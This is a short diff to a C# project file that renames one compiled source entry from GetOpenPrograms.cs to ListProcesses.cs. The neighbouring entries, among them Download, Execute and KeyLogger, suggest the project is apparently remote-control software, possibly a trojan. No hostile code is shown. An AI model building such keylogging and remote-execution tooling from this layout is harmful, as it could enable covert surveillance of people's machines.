--- a/ServerCommands/ServerCommands.csproj
+++ b/ServerCommands/ServerCommands.csproj
@@ -59,7 +59,7 @@
     <Compile Include="Download.cs" />
     <Compile Include="DownloadUrl.cs" />
     <Compile Include="Execute.cs" />
-    <Compile Include="GetOpenPrograms.cs" />
+    <Compile Include="ListProcesses.cs" />
     <Compile Include="KeyLogger.cs" />
     <Compile Include="PlaySound.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
